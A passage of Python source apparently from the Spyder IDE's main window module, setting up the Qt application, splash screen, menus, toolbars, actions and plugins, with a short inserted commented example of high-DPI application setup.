#============================================================================== from spyder.config.main import CONF if hasattr(Qt, 'AA_EnableHighDpiScaling'): QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, CONF.get('main', 'high_dpi_scaling')) #============================================================================== # Create our QApplication instance here because it's needed to render the # splash screen created below #============================================================================== from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR from spyder.config.base import get_image_path MAIN_APP = qapplication() if PYQT5: APP_ICON = QIcon(get_image_path("spyder.svg")) else: APP_ICON = QIcon(get_image_path("spyder.png")) MAIN_APP.setWindowIcon(APP_ICON) #============================================================================== # Create splash screen out of MainWindow to reduce perceived startup time. #============================================================================== from spyder.config.base import _, get_image_path, DEV, running_under_pytest if not running_under_pytest(): SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg'))) SPLASH_FONT = SPLASH.font() SPLASH_FONT.setPixelSize(10) SPLASH.setFont(SPLASH_FONT) SPLASH.show() SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute, QColor(Qt.white)) QApplication.processEvents() else: SPLASH = None #============================================================================== # Local utility imports #============================================================================== from spyder import (__version__, __project_url__, __forum_url__, __trouble_url__, __website_url__, get_versions) from spyder.config.base import (get_conf_path, get_module_source_path, STDERR, get_debug_level, MAC_APP_NAME, get_home_dir, running_in_mac_app, get_module_path, reset_config_files) from spyder.config.main import OPEN_FILES_PORT from spyder.config.utils import IMPORT_EXT, is_gtk_desktop from spyder.app.cli_options import get_options from spyder import dependencies from spyder.py3compat import (is_text_string, to_text_string, PY3, qbytearray_to_str, configparser as cp) from spyder.utils import encoding, programs from spyder.utils import icon_manager as ima from spyder.utils.programs import is_module_installed from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable from spyder.widgets.fileswitcher import FileSwitcher from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH from spyder.plugins.editor.lsp.manager import LSPManager from spyder.config.gui import is_dark_font_color #============================================================================== # Local gui imports #============================================================================== # NOTE: Move (if possible) import's of widgets and plugins exactly where they # are needed in MainWindow to speed up perceived startup time (i.e. the time # from clicking the Spyder icon to showing the splash screen). 
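# ---------------------------------------------------------------------------
# Editor's illustrative sketch (not part of Spyder): the section above sets
# Qt.AA_EnableHighDpiScaling and only afterwards creates the QApplication,
# because the attribute has no effect once an application instance exists.
# A minimal standalone version of that ordering, assuming qtpy is available
# (the helper name below is hypothetical):
def _example_high_dpi_qapplication(enable_scaling=True):
    """Return a QApplication created after the high-DPI attribute is set."""
    from qtpy.QtCore import QCoreApplication, Qt
    from qtpy.QtWidgets import QApplication
    if enable_scaling and hasattr(Qt, 'AA_EnableHighDpiScaling'):
        # Must be called before the QApplication instance is constructed.
        QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)
    return QApplication.instance() or QApplication([])
# ---------------------------------------------------------------------------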
try: from spyder.utils.environ import WinUserEnvDialog except ImportError: WinUserEnvDialog = None # analysis:ignore from spyder.utils.qthelpers import (create_action, add_actions, get_icon, add_shortcut_to_tooltip, create_module_bookmark_actions, create_program_action, DialogManager, create_python_script_action, file_uri) from spyder.config.gui import get_shortcut from spyder.otherplugins import get_spyderplugins_mods from spyder.app import tour #============================================================================== # Third-party library imports #============================================================================== import qdarkstyle #============================================================================== # Get the cwd before initializing WorkingDirectory, which sets it to the one # used in the last session #============================================================================== CWD = getcwd_or_home() #============================================================================== # Utility functions #============================================================================== def get_python_doc_path(): """ Return Python documentation path (Windows: return the PythonXX.chm path if available) """ if os.name == 'nt': doc_path = osp.join(sys.prefix, "Doc") if not osp.isdir(doc_path): return python_chm = [path for path in os.listdir(doc_path) if re.match(r"(?i)Python[0-9]{3,6}.chm", path)] if python_chm: return file_uri(osp.join(doc_path, python_chm[0])) else: vinf = sys.version_info doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1]) python_doc = osp.join(doc_path, "index.html") if osp.isfile(python_doc): return file_uri(python_doc) def set_opengl_implementation(option): """ Set the OpenGL implementation used by Spyder. See issue 7447 for the details. 
""" if option == 'software': QCoreApplication.setAttribute(Qt.AA_UseSoftwareOpenGL) if QQuickWindow is not None: QQuickWindow.setSceneGraphBackend(QSGRendererInterface.Software) elif option == 'desktop': QCoreApplication.setAttribute(Qt.AA_UseDesktopOpenGL) if QQuickWindow is not None: QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL) elif option == 'gles': QCoreApplication.setAttribute(Qt.AA_UseOpenGLES) if QQuickWindow is not None: QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL) def setup_logging(cli_options): """Setup logging with cli options defined by the user.""" if cli_options.debug_info or get_debug_level() > 0: levels = {2: logging.INFO, 3: logging.DEBUG} log_level = levels[get_debug_level()] log_format = '%(asctime)s [%(levelname)s] [%(name)s] -> %(message)s' if cli_options.debug_output == 'file': log_file = 'spyder-debug.log' else: log_file = None logging.basicConfig(level=log_level, format=log_format, filename=log_file, filemode='w+') # ============================================================================= # Dependencies # ============================================================================= QDARKSTYLE_REQVER = '>=2.6.4' dependencies.add("qdarkstyle", _("Dark style for the entire interface"), required_version=QDARKSTYLE_REQVER) #============================================================================== # Main Window #============================================================================== class MainWindow(QMainWindow): """Spyder main window""" DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime() SPYDER_PATH = get_conf_path('path') SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path') BOOKMARKS = ( ('Python2', "https://docs.python.org/2/index.html", _("Python2 documentation")), ('Python3', "https://docs.python.org/3/index.html", _("Python3 documentation")), ('numpy', "https://docs.scipy.org/doc/", _("Numpy and Scipy documentation")), ('matplotlib', "https://matplotlib.org/contents.html", _("Matplotlib documentation")), ('PyQt5', "http://pyqt.sourceforge.net/Docs/PyQt5/", _("PyQt5 Reference Guide")), ('PyQt5', "http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html", _("PyQt5 API Reference")), ('winpython', "https://winpython.github.io/", _("WinPython")) ) DEFAULT_LAYOUTS = 4 # Signals restore_scrollbar_position = Signal() all_actions_defined = Signal() sig_pythonpath_changed = Signal() sig_open_external_file = Signal(str) sig_resized = Signal("QResizeEvent") # related to interactive tour sig_moved = Signal("QMoveEvent") # related to interactive tour def __init__(self, options=None): QMainWindow.__init__(self) qapp = QApplication.instance() if PYQT5: # Enabling scaling for high dpi qapp.setAttribute(Qt.AA_UseHighDpiPixmaps) self.default_style = str(qapp.style().objectName()) self.dialog_manager = DialogManager() self.init_workdir = options.working_directory self.profile = options.profile self.multithreaded = options.multithreaded self.new_instance = options.new_instance self.open_project = options.project self.window_title = options.window_title logger.info("Start of MainWindow constructor") def signal_handler(signum, frame=None): """Handler for signals.""" sys.stdout.write('Handling signal: %s\n' % signum) sys.stdout.flush() QApplication.quit() if os.name == "nt": try: import win32api win32api.SetConsoleCtrlHandler(signal_handler, True) except ImportError: pass else: signal.signal(signal.SIGTERM, signal_handler) if not DEV: # Make spyder quit 
when presing ctrl+C in the console # In DEV Ctrl+C doesn't quit, because it helps to # capture the traceback when spyder freezes signal.signal(signal.SIGINT, signal_handler) # Use a custom Qt stylesheet if sys.platform == 'darwin': spy_path = get_module_source_path('spyder') img_path = osp.join(spy_path, 'images') mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read() mac_style = mac_style.replace('$IMAGE_PATH', img_path) self.setStyleSheet(mac_style) # Shortcut management data self.shortcut_data = [] # Loading Spyder path self.path = [] self.not_active_path = [] self.project_path = [] if osp.isfile(self.SPYDER_PATH): self.path, _x = encoding.readlines(self.SPYDER_PATH) self.path = [name for name in self.path if osp.isdir(name)] if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH): self.not_active_path, _x = \ encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH) self.not_active_path = \ [name for name in self.not_active_path if osp.isdir(name)] self.remove_path_from_sys_path() self.add_path_to_sys_path() # Plugins self.console = None self.workingdirectory = None self.editor = None self.explorer = None self.help = None self.onlinehelp = None self.projects = None self.outlineexplorer = None self.historylog = None self.ipyconsole = None self.variableexplorer = None self.plots = None self.findinfiles = None self.thirdparty_plugins = [] # Tour # TODO: Should I consider it a plugin?? or? self.tour = None self.tours_available = None # File switcher self.fileswitcher = None # Check for updates Thread and Worker, refereces needed to prevent # segfaulting self.check_updates_action = None self.thread_updates = None self.worker_updates = None self.give_updates_feedback = True # Preferences from spyder.preferences.appearance import AppearanceConfigPage from spyder.preferences.general import MainConfigPage from spyder.preferences.shortcuts import ShortcutsConfigPage from spyder.preferences.runconfig import RunConfigPage from spyder.preferences.maininterpreter import MainInterpreterConfigPage from spyder.preferences.languageserver import LSPManagerConfigPage self.general_prefs = [MainConfigPage, AppearanceConfigPage, ShortcutsConfigPage, MainInterpreterConfigPage, RunConfigPage, LSPManagerConfigPage] self.prefs_index = None self.prefs_dialog_size = None # Quick Layouts and Dialogs from spyder.preferences.layoutdialog import (LayoutSaveDialog, LayoutSettingsDialog) self.dialog_layout_save = LayoutSaveDialog self.dialog_layout_settings = LayoutSettingsDialog # Actions self.lock_interface_action = None self.show_toolbars_action = None self.close_dockwidget_action = None self.undo_action = None self.redo_action = None self.copy_action = None self.cut_action = None self.paste_action = None self.selectall_action = None self.maximize_action = None self.fullscreen_action = None # Menu bars self.file_menu = None self.file_menu_actions = [] self.edit_menu = None self.edit_menu_actions = [] self.search_menu = None self.search_menu_actions = [] self.source_menu = None self.source_menu_actions = [] self.run_menu = None self.run_menu_actions = [] self.debug_menu = None self.debug_menu_actions = [] self.consoles_menu = None self.consoles_menu_actions = [] self.projects_menu = None self.projects_menu_actions = [] self.tools_menu = None self.tools_menu_actions = [] self.external_tools_menu = None # We must keep a reference to this, # otherwise the external tools menu is lost after leaving setup method self.external_tools_menu_actions = [] self.view_menu = None self.plugins_menu = None self.plugins_menu_actions = [] 
self.toolbars_menu = None self.help_menu = None self.help_menu_actions = [] # Status bar widgets self.mem_status = None self.cpu_status = None # Toolbars self.visible_toolbars = [] self.toolbarslist = [] self.main_toolbar = None self.main_toolbar_actions = [] self.file_toolbar = None self.file_toolbar_actions = [] self.edit_toolbar = None self.edit_toolbar_actions = [] self.search_toolbar = None self.search_toolbar_actions = [] self.source_toolbar = None self.source_toolbar_actions = [] self.run_toolbar = None self.run_toolbar_actions = [] self.debug_toolbar = None self.debug_toolbar_actions = [] self.layout_toolbar = None self.layout_toolbar_actions = [] if running_under_pytest(): # Show errors in internal console when testing. CONF.set('main', 'show_internal_errors', False) # Set window title self.set_window_title() if set_windows_appusermodelid != None: res = set_windows_appusermodelid() logger.info("appusermodelid: %s", res) # Setting QTimer if running in travis test_travis = os.environ.get('TEST_CI_APP', None) if test_travis is not None: global MAIN_APP timer_shutdown_time = 30000 self.timer_shutdown = QTimer(self) self.timer_shutdown.timeout.connect(MAIN_APP.quit) self.timer_shutdown.start(timer_shutdown_time) # Showing splash screen self.splash = SPLASH if CONF.get('main', 'current_version', '') != __version__: CONF.set('main', 'current_version', __version__) # Execute here the actions to be performed only once after # each update (there is nothing there for now, but it could # be useful some day...) # List of satellite widgets (registered in add_dockwidget): self.widgetlist = [] # Flags used if closing() is called by the exit() shell command self.already_closed = False self.is_starting_up = True self.is_setting_up = True self.interface_locked = CONF.get('main', 'panes_locked') self.floating_dockwidgets = [] self.window_size = None self.window_position = None self.state_before_maximizing = None self.current_quick_layout = None self.previous_layout_settings = None # TODO: related to quick layouts self.last_plugin = None self.fullscreen_flag = None # isFullscreen does not work as expected # The following flag remember the maximized state even when # the window is in fullscreen mode: self.maximized_flag = None # The following flag is used to restore window's geometry when # toggling out of fullscreen mode in Windows. self.saved_normal_geometry = None # To keep track of the last focused widget self.last_focused_widget = None self.previous_focused_widget = None # Server to open external files on a single instance # This is needed in order to handle socket creation problems. # See issue 4132 if os.name == 'nt': try: self.open_files_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) except OSError as e: self.open_files_server = None QMessageBox.warning(None, "Spyder", _("An error occurred while creating a socket needed " "by Spyder. 
Please, try to run as an Administrator " "from cmd.exe the following command and then " "restart your computer: <br><br><span " "style=\'color: #555555\'><b>netsh winsock reset" "</b></span><br>")) else: self.open_files_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) # Apply preferences self.apply_settings() # To set all dockwidgets tabs to be on top (in case we want to do it # in the future) # self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North) logger.info("End of MainWindow constructor") #---- Window setup def create_toolbar(self, title, object_name, iconsize=24): """Create and return toolbar with *title* and *object_name*""" toolbar = self.addToolBar(title) toolbar.setObjectName(object_name) toolbar.setIconSize(QSize(iconsize, iconsize)) self.toolbarslist.append(toolbar) return toolbar def setup(self): """Setup main window""" logger.info("*** Start of MainWindow setup ***") logger.info("Applying theme configuration...") ui_theme = CONF.get('appearance', 'ui_theme') color_scheme = CONF.get('appearance', 'selected') if ui_theme == 'dark': self.setStyleSheet(qdarkstyle.load_stylesheet_from_environment()) css_path = DARK_CSS_PATH elif ui_theme == 'automatic': if not is_dark_font_color(color_scheme): self.setStyleSheet( qdarkstyle.load_stylesheet_from_environment()) css_path = DARK_CSS_PATH else: css_path = CSS_PATH else: css_path = CSS_PATH logger.info("Creating core actions...") self.close_dockwidget_action = create_action( self, icon=ima.icon('close_pane'), text=_("Close current pane"), triggered=self.close_current_dockwidget, context=Qt.ApplicationShortcut ) self.register_shortcut(self.close_dockwidget_action, "_", "Close pane") self.lock_interface_action = create_action( self, _("Lock panes and toolbars"), toggled=self.toggle_lock, context=Qt.ApplicationShortcut) self.register_shortcut(self.lock_interface_action, "_", "Lock unlock panes") # custom layouts shortcuts self.toggle_next_layout_action = create_action(self, _("Use next layout"), triggered=self.toggle_next_layout, context=Qt.ApplicationShortcut) self.toggle_previous_layout_action = create_action(self, _("Use previous layout"), triggered=self.toggle_previous_layout, context=Qt.ApplicationShortcut) self.register_shortcut(self.toggle_next_layout_action, "_", "Use next layout") self.register_shortcut(self.toggle_previous_layout_action, "_", "Use previous layout") # File switcher shortcuts self.file_switcher_action = create_action( self, _('File switcher...'), icon=ima.icon('filelist'), tip=_('Fast switch between files'), triggered=self.open_fileswitcher, context=Qt.ApplicationShortcut) self.register_shortcut(self.file_switcher_action, context="_", name="File switcher") self.symbol_finder_action = create_action( self, _('Symbol finder...'), icon=ima.icon('symbol_find'), tip=_('Fast symbol search in file'), triggered=self.open_symbolfinder, context=Qt.ApplicationShortcut) self.register_shortcut(self.symbol_finder_action, context="_", name="symbol finder", add_sc_to_tip=True) self.file_toolbar_actions = [self.file_switcher_action, self.symbol_finder_action] def create_edit_action(text, tr_text, icon): textseq = text.split(' ') method_name = textseq[0].lower()+"".join(textseq[1:]) action = create_action(self, tr_text, icon=icon, triggered=self.global_callback, data=method_name, context=Qt.WidgetShortcut) self.register_shortcut(action, "Editor", text) return action self.undo_action = create_edit_action('Undo', _('Undo'), ima.icon('undo')) self.redo_action = create_edit_action('Redo', _('Redo'), 
ima.icon('redo')) self.copy_action = create_edit_action('Copy', _('Copy'), ima.icon('editcopy')) self.cut_action = create_edit_action('Cut', _('Cut'), ima.icon('editcut')) self.paste_action = create_edit_action('Paste', _('Paste'), ima.icon('editpaste')) self.selectall_action = create_edit_action("Select All", _("Select All"), ima.icon('selectall')) self.edit_menu_actions = [self.undo_action, self.redo_action, None, self.cut_action, self.copy_action, self.paste_action, self.selectall_action] namespace = None logger.info("Creating toolbars...") # File menu/toolbar self.file_menu = self.menuBar().addMenu(_("&File")) self.file_toolbar = self.create_toolbar(_("File toolbar"), "file_toolbar") # Edit menu/toolbar self.edit_menu = self.menuBar().addMenu(_("&Edit")) self.edit_toolbar = self.create_toolbar(_("Edit toolbar"), "edit_toolbar") # Search menu/toolbar self.search_menu = self.menuBar().addMenu(_("&Search")) self.search_toolbar = self.create_toolbar(_("Search toolbar"), "search_toolbar") # Source menu/toolbar self.source_menu = self.menuBar().addMenu(_("Sour&ce")) self.source_toolbar = self.create_toolbar(_("Source toolbar"), "source_toolbar") # Run menu/toolbar self.run_menu = self.menuBar().addMenu(_("&Run")) self.run_toolbar = self.create_toolbar(_("Run toolbar"), "run_toolbar") # Debug menu/toolbar self.debug_menu = self.menuBar().addMenu(_("&Debug")) self.debug_toolbar = self.create_toolbar(_("Debug toolbar"), "debug_toolbar") # Consoles menu/toolbar self.consoles_menu = self.menuBar().addMenu(_("C&onsoles")) self.consoles_menu.aboutToShow.connect( self.update_execution_state_kernel) # Projects menu self.projects_menu = self.menuBar().addMenu(_("&Projects")) self.projects_menu.aboutToShow.connect(self.valid_project) # Tools menu self.tools_menu = self.menuBar().addMenu(_("&Tools")) # View menu self.view_menu = self.menuBar().addMenu(_("&View")) # Help menu self.help_menu = self.menuBar().addMenu(_("&Help")) # Status bar status = self.statusBar() status.setObjectName("StatusBar") status.showMessage(_("Welcome to Spyder!"), 5000) logger.info("Creating Tools menu...") # Tools + External Tools prefs_action = create_action(self, _("Pre&ferences"), icon=ima.icon('configure'), triggered=self.edit_preferences, context=Qt.ApplicationShortcut) self.register_shortcut(prefs_action, "_", "Preferences", add_sc_to_tip=True) spyder_path_action = create_action(self, _("PYTHONPATH manager"), None, icon=ima.icon('pythonpath'), triggered=self.path_manager_callback, tip=_("Python Path Manager"), menurole=QAction.ApplicationSpecificRole) reset_spyder_action = create_action( self, _("Reset Spyder to factory defaults"), triggered=self.reset_spyder) self.tools_menu_actions = [prefs_action, spyder_path_action] if WinUserEnvDialog is not None: winenv_action = create_action(self, _("Current user environment variables..."), icon='win_env.png', tip=_("Show and edit current user environment " "variables in Windows registry " "(i.e. 
for all sessions)"), triggered=self.win_env) self.tools_menu_actions.append(winenv_action) self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action] # External Tools submenu self.external_tools_menu = QMenu(_("External Tools")) self.external_tools_menu_actions = [] # WinPython control panel self.wp_action = create_action(self, _("WinPython control panel"), icon=get_icon('winpython.svg'), triggered=lambda: programs.run_python_script('winpython', 'controlpanel')) if os.name == 'nt' and is_module_installed('winpython'): self.external_tools_menu_actions.append(self.wp_action) # Qt-related tools additact = [] for name in ("designer-qt4", "designer"): qtdact = create_program_action(self, _("Qt Designer"), name) if qtdact: break for name in ("linguist-qt4", "linguist"): qtlact = create_program_action(self, _("Qt Linguist"), "linguist") if qtlact: break args = ['-no-opengl'] if os.name == 'nt' else [] for act in (qtdact, qtlact): if act: additact.append(act) if additact and is_module_installed('winpython'): self.external_tools_menu_actions += [None] + additact # Guidata and Sift logger.info("Creating guidata and sift entries...") gdgq_act = [] # Guidata and Guiqwt don't support PyQt5 yet and they fail # with an AssertionError when imported using those bindings # (see issue 2274) try: from guidata import configtools from guidata import config # analysis:ignore guidata_icon = configtools.get_icon('guidata.svg') guidata_act = create_python_script_action(self, _("guidata examples"), guidata_icon, "guidata", osp.join("tests", "__init__")) gdgq_act += [guidata_act] except: pass try: from guidata import configtools from guiqwt import config # analysis:ignore guiqwt_icon = configtools.get_icon('guiqwt.svg') guiqwt_act = create_python_script_action(self, _("guiqwt examples"), guiqwt_icon, "guiqwt", osp.join("tests", "__init__")) if guiqwt_act: gdgq_act += [guiqwt_act] sift_icon = configtools.get_icon('sift.svg') sift_act = create_python_script_action(self, _("Sift"), sift_icon, "guiqwt", osp.join("tests", "sift")) if sift_act: gdgq_act += [sift_act] except: pass if gdgq_act: self.external_tools_menu_actions += [None] + gdgq_act # Maximize current plugin self.maximize_action = create_action(self, '', triggered=self.maximize_dockwidget, context=Qt.ApplicationShortcut) self.register_shortcut(self.maximize_action, "_", "Maximize pane") self.__update_maximize_action() # Fullscreen mode self.fullscreen_action = create_action(self, _("Fullscreen mode"), triggered=self.toggle_fullscreen, context=Qt.ApplicationShortcut) self.register_shortcut(self.fullscreen_action, "_", "Fullscreen mode", add_sc_to_tip=True) # Main toolbar self.main_toolbar_actions = [self.maximize_action, self.fullscreen_action, None, prefs_action, spyder_path_action] self.main_toolbar = self.create_toolbar(_("Main toolbar"), "main_toolbar") # Internal console plugin logger.info("Loading internal console...") from spyder.plugins.console.plugin import Console self.console = Console(self, namespace, exitfunc=self.closing, profile=self.profile, multithreaded=self.multithreaded, message=_("Spyder Internal Console\n\n" "This console is used to report application\n" "internal errors and to inspect Spyder\n" "internals with the following commands:\n" " spy.app, spy.window, dir(spy)\n\n" "Please don't use it to run your code\n\n")) self.console.register_plugin() # Language Server Protocol Client initialization self.set_splash(_("Starting Language Server Protocol manager...")) self.lspmanager = LSPManager(self) # Working directory plugin 
logger.info("Loading working directory...") from spyder.plugins.workingdirectory.plugin import WorkingDirectory self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self) self.workingdirectory.register_plugin() self.toolbarslist.append(self.workingdirectory.toolbar) # Help plugin if CONF.get('help', 'enable'): self.set_splash(_("Loading help...")) from spyder.plugins.help.plugin import Help self.help = Help(self, css_path=css_path) self.help.register_plugin() # Outline explorer widget if CONF.get('outline_explorer', 'enable'): self.set_splash(_("Loading outline explorer...")) from spyder.plugins.outlineexplorer.plugin import OutlineExplorer self.outlineexplorer = OutlineExplorer(self) self.outlineexplorer.register_plugin() # Editor plugin self.set_splash(_("Loading editor...")) from spyder.plugins.editor.plugin import Editor self.editor = Editor(self) self.editor.register_plugin() # Start LSP client self.set_splash(_("Launching LSP Client for Python...")) self.lspmanager.start_lsp_client('python') # Populating file menu entries quit_action = create_action(self, _("&Quit"), icon=ima.icon('exit'), tip=_("Quit"), triggered=self.console.quit, context=Qt.ApplicationShortcut) self.register_shortcut(quit_action, "_", "Quit") restart_action = create_action(self, _("&Restart"), icon=ima.icon('restart'), tip=_("Restart"), triggered=self.restart, context=Qt.ApplicationShortcut) self.register_shortcut(restart_action, "_", "Restart") self.file_menu_actions += [self.file_switcher_action, self.symbol_finder_action, None, restart_action, quit_action] self.set_splash("") # Namespace browser self.set_splash(_("Loading namespace browser...")) from spyder.plugins.variableexplorer.plugin import VariableExplorer self.variableexplorer = VariableExplorer(self) self.variableexplorer.register_plugin() # Figure browser self.set_splash(_("Loading figure browser...")) from spyder.plugins.plots.plugin import Plots self.plots = Plots(self) self.plots.register_plugin() # History log widget if CONF.get('historylog', 'enable'): self.set_splash(_("Loading history plugin...")) from spyder.plugins.history.plugin import HistoryLog self.historylog = HistoryLog(self) self.historylog.register_plugin() # IPython console self.set_splash(_("Loading IPython console...")) from spyder.plugins.ipythonconsole.plugin import IPythonConsole self.ipyconsole = IPythonConsole(self, css_path=css_path) self.ipyconsole.register_plugin() # Explorer if CONF.get('explorer', 'enable'): self.set_splash(_("Loading file explorer...")) from spyder.plugins.explorer.plugin import Explorer self.explorer = Explorer(self) self.explorer.register_plugin() # Online help widget try: # Qt >= v4.4 from spyder.plugins.onlinehelp.plugin import OnlineHelp except ImportError: # Qt < v4.4 OnlineHelp = None # analysis:ignore if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None: self.set_splash(_("Loading online help...")) self.onlinehelp = OnlineHelp(self) self.onlinehelp.register_plugin() # Project explorer widget self.set_splash(_("Loading project explorer...")) from spyder.plugins.projects.plugin import Projects self.projects = Projects(self) self.projects.register_plugin() self.project_path = self.projects.get_pythonpath(at_start=True) # Find in files if CONF.get('find_in_files', 'enable'): from spyder.plugins.findinfiles.plugin import FindInFiles self.findinfiles = FindInFiles(self) self.findinfiles.register_plugin() # Load other plugins (former external plugins) # TODO: Use this bucle to load all internall plugins and remove # duplicated 
code other_plugins = ['breakpoints', 'profiler', 'pylint'] for plugin_name in other_plugins: if CONF.get(plugin_name, 'enable'): module = importlib.import_module( 'spyder.plugins.{}'.format(plugin_name)) plugin = module.PLUGIN_CLASS(self) if plugin.check_compatibility()[0]: self.thirdparty_plugins.append(plugin) plugin.register_plugin() # Third-party plugins self.set_splash(_("Loading third-party plugins...")) for mod in get_spyderplugins_mods(): try: plugin = mod.PLUGIN_CLASS(self) if plugin.check_compatibility()[0]: self.thirdparty_plugins.append(plugin) plugin.register_plugin() except Exception as error: print("%s: %s" % (mod, str(error)), file=STDERR) traceback.print_exc(file=STDERR) self.set_splash(_("Setting up main window...")) # Help menu trouble_action = create_action(self, _("Troubleshooting..."), triggered=self.trouble_guide) dep_action = create_action(self, _("Dependencies..."), triggered=self.show_dependencies, icon=ima.icon('advanced')) report_action = create_action(self, _("Report issue..."), icon=ima.icon('bug'), triggered=self.report_issue) support_action = create_action(self, _("Spyder support..."), triggered=self.google_group) self.check_updates_action = create_action(self, _("Check for updates..."), triggered=self.check_updates) # Spyder documentation spyder_doc = 'https://docs.spyder-ide.org/' doc_action = create_action(self, _("Spyder documentation"), icon=ima.icon('DialogHelpButton'), triggered=lambda: programs.start_file(spyder_doc)) self.register_shortcut(doc_action, "_", "spyder documentation") if self.help is not None: tut_action = create_action(self, _("Spyder tutorial"), triggered=self.help.show_tutorial) else: tut_action = None shortcuts_action = create_action(self, _("Shortcuts Summary"), shortcut="Meta+F1", triggered=self.show_shortcuts_dialog) #----- Tours self.tour = tour.AnimatedTour(self) self.tours_menu = QMenu(_("Interactive tours"), self) self.tour_menu_actions = [] # TODO: Only show intro tour for now. When we are close to finish # 3.0, we will finish and show the other tour self.tours_available = tour.get_tours(0) for i, tour_available in enumerate(self.tours_available): self.tours_available[i]['last'] = 0 tour_name = tour_available['name'] def trigger(i=i, self=self): # closure needed! 
return lambda: self.show_tour(i) temp_action = create_action(self, tour_name, tip="", triggered=trigger()) self.tour_menu_actions += [temp_action] self.tours_menu.addActions(self.tour_menu_actions) self.help_menu_actions = [doc_action, tut_action, shortcuts_action, self.tours_menu, MENU_SEPARATOR, trouble_action, report_action, dep_action, self.check_updates_action, support_action, MENU_SEPARATOR] # Python documentation if get_python_doc_path() is not None: pydoc_act = create_action(self, _("Python documentation"), triggered=lambda: programs.start_file(get_python_doc_path())) self.help_menu_actions.append(pydoc_act) # IPython documentation if self.help is not None: ipython_menu = QMenu(_("IPython documentation"), self) intro_action = create_action(self, _("Intro to IPython"), triggered=self.ipyconsole.show_intro) quickref_action = create_action(self, _("Quick reference"), triggered=self.ipyconsole.show_quickref) guiref_action = create_action(self, _("Console help"), triggered=self.ipyconsole.show_guiref) add_actions(ipython_menu, (intro_action, guiref_action, quickref_action)) self.help_menu_actions.append(ipython_menu) # Windows-only: documentation located in sys.prefix/Doc ipm_actions = [] def add_ipm_action(text, path): """Add installed Python module doc action to help submenu""" # QAction.triggered works differently for PySide and PyQt path = file_uri(path) if not API == 'pyside': slot=lambda _checked, path=path: programs.start_file(path) else: slot=lambda path=path: programs.start_file(path) action = create_action(self, text, icon='%s.png' % osp.splitext(path)[1][1:], triggered=slot) ipm_actions.append(action) sysdocpth = osp.join(sys.prefix, 'Doc') if osp.isdir(sysdocpth): # exists on Windows, except frozen dist. for docfn in os.listdir(sysdocpth): pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)' match = re.match(pt, docfn) if match is not None: pname = match.groups()[0] if pname not in ('Python', ): add_ipm_action(pname, osp.join(sysdocpth, docfn)) # Installed Python modules submenu (Windows only) if ipm_actions: pymods_menu = QMenu(_("Installed Python modules"), self) add_actions(pymods_menu, ipm_actions) self.help_menu_actions.append(pymods_menu) # Online documentation web_resources = QMenu(_("Online documentation"), self) webres_actions = create_module_bookmark_actions(self, self.BOOKMARKS) webres_actions.insert(2, None) webres_actions.insert(5, None) webres_actions.insert(8, None) add_actions(web_resources, webres_actions) self.help_menu_actions.append(web_resources) # Qt assistant link if sys.platform.startswith('linux') and not PYQT5: qta_exe = "assistant-qt4" else: qta_exe = "assistant" qta_act = create_program_action(self, _("Qt documentation"), qta_exe) if qta_act: self.help_menu_actions += [qta_act, None] # About Spyder about_action = create_action(self, _("About %s...") % "Spyder", icon=ima.icon('MessageBoxInformation'), triggered=self.about) self.help_menu_actions += [MENU_SEPARATOR, about_action] # Status bar widgets from spyder.widgets.status import MemoryStatus, CPUStatus self.mem_status = MemoryStatus(self, status) self.cpu_status = CPUStatus(self, status) self.apply_statusbar_settings() # ----- View # View menu self.plugins_menu = QMenu(_("Panes"), self) self.toolbars_menu = QMenu(_("Toolbars"), self) self.quick_layout_menu = QMenu(_("Window layouts"), self) self.quick_layout_set_menu() self.view_menu.addMenu(self.plugins_menu) # Panes add_actions(self.view_menu, (self.lock_interface_action, self.close_dockwidget_action, self.maximize_action, 
MENU_SEPARATOR)) self.show_toolbars_action = create_action(self, _("Show toolbars"), triggered=self.show_toolbars, context=Qt.ApplicationShortcut) self.register_shortcut(self.show_toolbars_action, "_", "Show toolbars") self.view_menu.addMenu(self.toolbars_menu) self.view_menu.addAction(self.show_toolbars_action) add_actions(self.view_menu, (MENU_SEPARATOR, self.quick_layout_menu, self.toggle_previous_layout_action, self.toggle_next_layout_action, MENU_SEPARATOR, self.fullscreen_action)) if set_attached_console_visible is not None: cmd_act = create_action(self, _("Attached console window (debugging)"), toggled=set_attached_console_visible) cmd_act.setChecked(is_attached_console_visible()) add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act)) # Adding external tools action to "Tools" menu if self.external_tools_menu_actions: external_tools_act = create_action(self, _("External Tools")) external_tools_act.setMenu(self.external_tools_menu) self.tools_menu_actions += [None, external_tools_act] # Filling out menu/toolbar entries: add_actions(self.file_menu, self.file_menu_actions) add_actions(self.edit_menu, self.edit_menu_actions) add_actions(self.search_menu, self.search_menu_actions) add_actions(self.source_menu, self.source_menu_actions) add_actions(self.run_menu, self.run_menu_actions) add_actions(self.debug_menu, self.debug_menu_actions) add_actions(self.consoles_menu, self.consoles_menu_actions) add_actions(self.projects_menu, self.projects_menu_actions) add_actions(self.tools_menu, self.tools_menu_actions) 